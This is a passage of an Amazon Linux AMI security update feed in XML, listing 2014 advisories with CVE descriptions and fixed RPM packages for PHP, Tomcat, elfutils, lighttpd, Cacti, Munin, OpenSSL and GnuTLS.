name="php54-common" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.28" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.28-1.54.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.28-1.54.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.28" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.28-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-344</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-344: medium priority package update for tomcat6</title><issued date="2014-05-21 10:45:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0050:
A denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request.
CVE-2013-4322:
It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default.
CVE-2013-4286:
It was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. A remote attacker could use this flaw to poison a web cache, perform cross-site scripting (XSS) attacks, or obtain sensitive information from other requests.
CVE-2012-3544:
It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3544" title="" id="CVE-2012-3544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4286" title="" id="CVE-2013-4286" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322" title="" id="CVE-2013-4322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050" title="" id="CVE-2014-0050" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0429.html" title="" id="RHSA-2014:0429" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-servlet-2.5-api" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.39" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.39-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-345</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-345: medium priority package update for elfutils</title><issued date="2014-05-21 10:48:00" /><updated date="2014-09-18 00:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0172:
Integer overflow in the check_section function in dwarf_begin_elf.c in the libdw library, as used in elfutils 0.153 and possibly through 0.158 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a malformed compressed debug section in an ELF file, which triggers a heap-based buffer overflow.
1085663:
CVE-2014-0172 elfutils: integer overflow, leading to a heap-based buffer overflow in libdw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0172" title="" id="CVE-2014-0172" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="elfutils-debuginfo" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-debuginfo-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-devel-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-devel-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libelf-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libelf-devel-static-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-devel-static-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-libs" version="0.158" release="3.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/elfutils-libs-0.158-3.16.amzn1.x86_64.rpm</filename></package><package name="elfutils-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-devel-static-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libelf-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-devel-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-debuginfo" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-debuginfo-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libs" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libs-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf-devel" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libelf-devel-0.158-3.16.amzn1.i686.rpm</filename></package><package name="elfutils-libelf-devel-static" version="0.158" release="3.16.amzn1" epoch="0" arch="i686"><filename>Packages/elfutils-libelf-devel-static-0.158-3.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-346</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-346: medium priority package update for lighttpd</title><issued date="2014-06-03 14:50:00" /><updated date="2014-09-18 00:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2324:
Multiple directory traversal vulnerabilities in (1) mod_evhost and (2) mod_simple_vhost in lighttpd before 1.4.35 allow remote attackers to read arbitrary files via a .. (dot dot) in the host name, related to request_check_hostname.
1075703:
CVE-2014-2323 CVE-2014-2324 lighttpd: SQL injection and directory traversal vulnerabilities
CVE-2014-2323:
SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
1075703:
CVE-2014-2323 CVE-2014-2324 lighttpd: SQL injection and directory traversal vulnerabilities
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323" title="" id="CVE-2014-2323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324" title="" id="CVE-2014-2324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-mod_mysql_vhost" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.35" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.35-1.9.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.35-1.9.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.35" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.35-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-347</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-347: medium priority package update for cacti</title><issued date="2014-06-03 14:59:00" /><updated date="2014-09-18 00:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2709:
lib/rrd.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in unspecified parameters.
1084258:
CVE-2014-2708 CVE-2014-2709 cacti: command injection issues fixed in bug#0002405
CVE-2014-2708:
Multiple SQL injection vulnerabilities in graph_xport.php in Cacti 0.8.7g, 0.8.8b, and earlier allow remote attackers to execute arbitrary SQL commands via the (1) graph_start, (2) graph_end, (3) graph_height, (4) graph_width, (5) graph_nolegend, (6) print_source, (7) local_graph_id, or (8) rra_id parameter.
1084258:
CVE-2014-2708 CVE-2014-2709 cacti: command injection issues fixed in bug#0002405
CVE-2014-2328:
lib/graph_export.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote authenticated users to execute arbitrary commands via shell metacharacters in unspecified vectors.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
CVE-2014-2327:
Cross-site request forgery (CSRF) vulnerability in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to hijack the authentication of users for unspecified commands, as demonstrated by requests that (1) modify binary files, (2) modify configurations, or (3) add arbitrary users.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
CVE-2014-2326:
Cross-site scripting (XSS) vulnerability in cdef.php in Cacti 0.8.7g, 0.8.8b, and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
1082122:
CVE-2014-2326 CVE-2014-2327 CVE-2014-2328 cacti: multiple flaws reported by Deutsche Telekom
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2326" title="" id="CVE-2014-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2327" title="" id="CVE-2014-2327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2328" title="" id="CVE-2014-2328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2708" title="" id="CVE-2014-2708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2709" title="" id="CVE-2014-2709" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="5.4.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-5.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-348</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-348: low priority package update for munin</title><issued date="2014-06-03 15:03:00" /><updated date="2014-09-18 00:39:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6359:
Munin::Master::Node in Munin before 2.0.18 allows remote attackers to cause a denial of service (abort data collection for node) via a plugin that uses "multigraph" as a multigraph service name.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
CVE-2013-6048:
The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin before 2.0.18 allows remote nodes to cause a denial of service (infinite loop and memory consumption in the munin-html process) via crafted multigraph data.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048" title="" id="CVE-2013-6048" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359" title="" id="CVE-2013-6359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-async" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-cgi" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.20-1.36.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.20" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.20-1.36.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-349</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-349: important priority package update for openssl</title><issued date="2014-06-04 15:45:00" /><updated date="2015-03-19 13:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0292:
An integer underflow flaw, leading to a heap-based buffer overflow, was found in the way OpenSSL decoded certain base64 strings. A remote attacker could provide a specially crafted base64 string via certain PEM processing routines that, when parsed by the OpenSSL library, would cause the OpenSSL server to crash.
1202395:
CVE-2015-0292 openssl: integer underflow leading to buffer overflow in base64 decoding
CVE-2014-3470:
CVE-2014-0224:
CVE-2014-0221:
CVE-2014-0198:
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic.
CVE-2014-0195:
CVE-2010-5298:
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298" title="" id="CVE-2010-5298" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195" title="" id="CVE-2014-0195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198" title="" id="CVE-2014-0198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221" title="" id="CVE-2014-0221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470" title="" id="CVE-2014-3470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0292" title="" id="CVE-2015-0292" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0625.html" title="" id="RHSA-2014:0625" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1h-1.72.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1h-1.72.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1h" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1h-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-350</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-350: important priority package update for openssl098e</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-18 00:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0224:
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0626.html" title="" id="RHSA-2014:0626" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl098e-debuginfo" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-18.2.13.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-18.2.13.amzn1.x86_64.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-18.2.13.amzn1.i686.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="18.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-18.2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-351</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-351: important priority package update for openssl097a</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-19 10:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0224:
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224" title="" id="CVE-2014-0224" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0626.html" title="" id="RHSA-2014:0626" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl097a-debuginfo" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl097a-debuginfo-0.9.7a-12.1.9.amzn1.x86_64.rpm</filename></package><package name="openssl097a" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl097a-0.9.7a-12.1.9.amzn1.x86_64.rpm</filename></package><package name="openssl097a" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/openssl097a-0.9.7a-12.1.9.amzn1.i686.rpm</filename></package><package name="openssl097a-debuginfo" version="0.9.7a" release="12.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/openssl097a-debuginfo-0.9.7a-12.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-352</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-352: important priority package update for gnutls</title><issued date="2014-06-05 15:38:00" /><updated date="2014-09-19 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3466:
A flaw was found in the way GnuTLS parsed session IDs from ServerHello messages of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session ID value, which would trigger a buffer overflow in a connecting TLS/SSL client application using GnuTLS, causing the client application to crash or, possibly, execute arbitrary code.
